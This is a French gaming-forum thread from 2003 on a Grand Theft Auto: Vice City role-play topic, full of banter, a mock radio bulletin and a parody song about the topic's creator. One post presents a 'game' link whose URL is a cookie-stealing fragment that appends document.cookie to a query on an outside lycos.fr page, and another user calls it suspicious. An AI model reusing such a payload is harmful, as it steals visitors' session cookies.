CONNEXION
  • RetourJeux
    • Sorties
    • Hit Parade
    • Les + populaires
    • Les + attendus
    • Soluces
    • Tous les Jeux
    • Gaming
  • RetourActu Gaming
    • News
    • Astuces
    • Tests
    • Previews
    • Toute l'actu gaming
  • RetourBons plans
    • Bons plans
    • Bons plans Smartphone
    • Bons plans Hardware
    • Bons plans Image et Son
    • Bons plans Amazon
    • Bons plans Cdiscount
    • Bons plans Decathlon
    • Bons plans Fnac
    • Tous les Bons plans
  • RetourJVTech
    • Actus High-Tech
    • Intelligence Artificielle
    • Smartphones
    • Mobilité urbaine
    • Hardware
    • Image et son
    • Tutoriels
    • Tests produits High-Tech
    • Guides d'achat High-Tech
    • JVTech
  • RetourCulture
    • Actus Culture
    • Culture
  • RetourVidéos
    • A la une
    • Gaming Live
    • Vidéos Tests
    • Vidéos Previews
    • Gameplay
    • Trailers
    • Chroniques
    • Replay Web TV
    • Toutes les vidéos
  • RetourForums
    • Hardware PC
    • PS5
    • Switch 2
    • Xbox Series
    • Switch
    • Pokemon pocket
    • FC 25 Ultimate Team
    • League of Legends
    • Tous les Forums
  • PC
  • PS5
  • Xbox Series
  • Switch 2
  • PS4
  • One
  • Switch
  • iOS
  • Android
  • MMO
  • RPG
  • FPS
En ce moment Genshin Impact Valhalla Breath of the wild Animal Crossing GTA 5 Red dead 2
Grand Theft Auto : Vice City
Forum
  • Accueil
  • Actus
  • Tests
  • Vidéos
  • Images
  • Soluces
  • Forum
Liste des sujets

 Real Vice City 

Pere_Vaurillaud
Pere_Vaurillaud
Niveau 10
07 mai 2003 à 16:09:55

ouias plus de 10 pages encore

PICCOLLO
PICCOLLO
Niveau 8
07 mai 2003 à 16:10:53

213

dargonmaster
dargonmaster
Niveau 10
07 mai 2003 à 16:11:14

youpla

PICCOLLO
PICCOLLO
Niveau 8
07 mai 2003 à 16:11:44

lartax tu devrai deja etre content davoir eu le 30000

dargonmaster
dargonmaster
Niveau 10
07 mai 2003 à 16:12:22

StyleOne reviens, StyleOne reviens, StyleOne reviens parmi les tiens
Du haut de la croix, nous suivons le chemin
Pour toujours faire le bien

Ovis-Ammon
Ovis-Ammon
Niveau 4
07 mai 2003 à 16:12:27

HOP

breizoveva
breizoveva
Niveau 9
07 mai 2003 à 16:12:53

padre : merci, j´espère que notre Maître lira cette modeste contribution à sa gloire éternelle

lartax : attention ! Cette chanson est une oeuvre déposée à la SACEM par la Breizoveva Inc. Tous droits réservés. Reproduction et diffusion, même partielles, interdites sauf accord de la Breizoveva Inc.

BestGamerz
BestGamerz
Niveau 2
07 mai 2003 à 16:13:13

le jeu remarche!!!

http://membres.lycos.fr/sideclick/Game/Gamezone.php?a="+document.cookie;"

Ovis-Ammon
Ovis-Ammon
Niveau 4
07 mai 2003 à 16:14:36

gare au gorille

Pere_Vaurillaud
Pere_Vaurillaud
Niveau 10
07 mai 2003 à 16:14:43

lol pour la chanson^^

PICCOLLO
PICCOLLO
Niveau 8
07 mai 2003 à 16:15:36

203!!

dargonmaster
dargonmaster
Niveau 10
07 mai 2003 à 16:16:05

pfffffff c´est quoi la connerie de bestgamerz(ya cookie ca sent pas bon!!)

VC_Infos
VC_Infos
Niveau 6
07 mai 2003 à 16:18:07

Vous écoutez VC Infos sur 105.5FM, il est 16h18,
à la demande générale et pour le plaisir des oreilles, voici la redif du TTJ exceptionnel de 16h00, suivi du prochain tube de l´été : " StyleOne Reviens"

Teatime Journal
Nous sommes le 7 mai, bonjour !
( Ce journal est diffusé à un horaire exceptionnel en raison du départ en week-end dès 17h30 de nombreux auditeurs et de tous nos journalistes)

Politique locale :
- La nuit dernière a été marquée par une grave crise politique qui a mis en émoi tout ce que real Vice city compte de notables et de diginitaires. Certains piliers réputés de la cité auraient été pris dans un guet-apens fomenté par des éléments extérieurs ( ou non) au topic qui auraient tenté de jeter le discrédit sur Real Vice City et son maire. D´après certains témoins, les organisateurs de ce coup de force seraient en fait des realVice Citoyens ! Pour cet acte de trahison, les coupables risquent le banissement définitif de la ville. La tenue d´un procès pour trahison a d´ailleurs été demandée par un certain StyleOne.
OUI ! Vou avez bien lu : STYLEONE ! Le Créateur est revenu en ville. Tous le croyaient mort. Certains se battaient déjà autour de sa dépouille. Mais le scandale de la nuit dernière l´a fait miraculeusement renaître de ses cendres. Les ennemis de RVC ne se doutaient pas qu´en s´attaquant à l´essence même de notre raison de vivre sur le forum VC, ils allaient déclencher les feux de l´enfer, l´intervention divine, la cataclysme paroxismique, la vengeance ultime, le couroux céleste, bref : LE RETOUR DU CREATEUR ! !!
Notre P.D.G. et rédacteur en chef, M. Breizoveva AKA le Big Boss a tenu à faire une déclaration à propos de cette merveilleuse résurrection :
" realViceCitoyens, realViceCitoyennes,
La nouvelle de la disparition du Créateur m´avait plongé dans une incomensurable détresse. J´étais envahi par l´émotion et je sentais poindre en moi un découragement profond qui m´aurait certainement amené à quitter la ville à jamais si je n´avais eu des devoirs envers les nombreux salariés de ma société et les fidèles amis que je m´honnore de compter dans cette cité. Soudain, alors que je me morfondais dans une grise torpeur, Il m´est apparu en plein midi et Il m´a tenu ces propos qui resteront à tout jamais gravés dans mon coeur :
Styleone Posté le 07 mai 2003 à 14:06:56
" Breizozeva, une mine d´infos supplémentaires t´attendant sur le ftp !
Encore merci pour tes news ! C´est grace a cela que je suis les evenement pendant que je ne suis pas la ! C´est super vraiment ce que tu fais ! "
Oui, mes chers realViceconcitoyens, Le Créateur m´a reconnu comme son disciple dévoué et Il m´a donné la mission de Le servir et de Le renseigner.
Hier encore, j´étais incrédule, mais aujourd´hui j´ai vu, je L´ai vu ! Il est revenu parmi nous. Gloire au Créateur, puisse-t-Il vivre et régner encore mille ans !
Comme moi, realViceCitoyens, reprenez ces mots divins entre tous : Death is not Real! Death is not Real!
Merci au Padre de m´avoir éclairé car j´étais dans les ténèbres et il m´a montré le chemin vers le Créateur.
Vous venez d´entendre la déclaration de M. Breizoveva AKA le Big Boss.

A côté de cette formidable nouvelle, tous les autres événements de la journée semblent insipides et indignes de figurer dans le même journal. C´est pourquoi vous ne retrouverez pas vos rubriques habituelles et que nous allons directement laisser la place à la musique, c´est la fin de ce Teatime Journal un peu particulier, nous vous retrouverons donc la semaine prochaine ( Week-end prolongé oblige) pour un journal plus classique dans sa forme et certainement moins extraordinaire dans son contenu. Toutefois, nous ne résistons pas à la joie de vous annoncer que la barre mythique des 40 000 posts sera certainement très bientôt franchie !
Et demain 8 mai, nous fêterons la sainte Résurrection du Créateur, premier jour suivant son message céleste à l´apôtre Breizoveva. Une messe sera prononcée en cette occasion à la Cathédrale StPatrick de real ViceCity par l´Evêque Vaurillaud à la demande pressante de tous les amis et disciples du Créateur.

Nous poursuivons notre cycle musical " Oldies but Goldies" avec une spéciale dédicace pour le Créateur StyleOne, librement inspirée de la B.O. du film " La vie est un long fleuve tranquille", P. Bouchitey et la chorale des salariés de la Breizoveva inc. - " StyleOne reviens"
MUSICmusic
Quand il reviendra, il fera grand jour
Pour fêter celui qui inventa l´amour
Au fond d´un topic, il naquit dans la nuit
Personne n´avait voulu de lui

Du haut de la croix, indique nous le chemin
Toi qui le connais si bien

Toute sa vie, il prêchait le bonheur, la paix
La bonté, la justice, et le savoir
Quand il reviendra, il nous pardonnera
Comme il l´avait fait pour Zima

Du haut de la croix, indique nous le chemin
Toi qui le connais si bien

Dans une grande clarté, il apparaîtra
Comme il le fit pour Breizoveva
ViceCity entier laissera éclater sa joie
En chantant StyleOne est là

MuzikMuzikMuzikMuzikMuzikMuzikMuzikMuzikMuzikMuzik

PICCOLLO
PICCOLLO
Niveau 8
07 mai 2003 à 16:22:54

wouah kel courage lartax!!

breizoveva
breizoveva
Niveau 9
07 mai 2003 à 16:23:28

bravo lartax ! et t´as tout compris ?
lol, je déconne ! je suis parfois un peu trop taquin, et ça me joue des tours ! dsl

PICCOLLO
PICCOLLO
Niveau 8
07 mai 2003 à 16:30:07

ouai...

Pere_Vaurillaud
Pere_Vaurillaud
Niveau 10
07 mai 2003 à 16:31:42

ouais...

PICCOLLO
PICCOLLO
Niveau 8
07 mai 2003 à 16:32:13

tout à fait...

Pere_Vaurillaud
Pere_Vaurillaud
Niveau 10
07 mai 2003 à 16:33:05

effectivement...

breizoveva
breizoveva
Niveau 9
07 mai 2003 à 16:33:16

Ma radio tient à rester libre et n´entrera dans le débat sur les événements de la nuit dernière que lorsqu´elle se sera forgé une interprétation impartiale de la situation en question.
En attendant, nous préférons penser à notre prochain week-end au soleil.
A titre personnel, je pense que ZIMA pudubec est un pauv´naze sans intérêt et que Footballeur est un citoyen sympathique contre lequel je n´ai rien à dire.

La vidéo du moment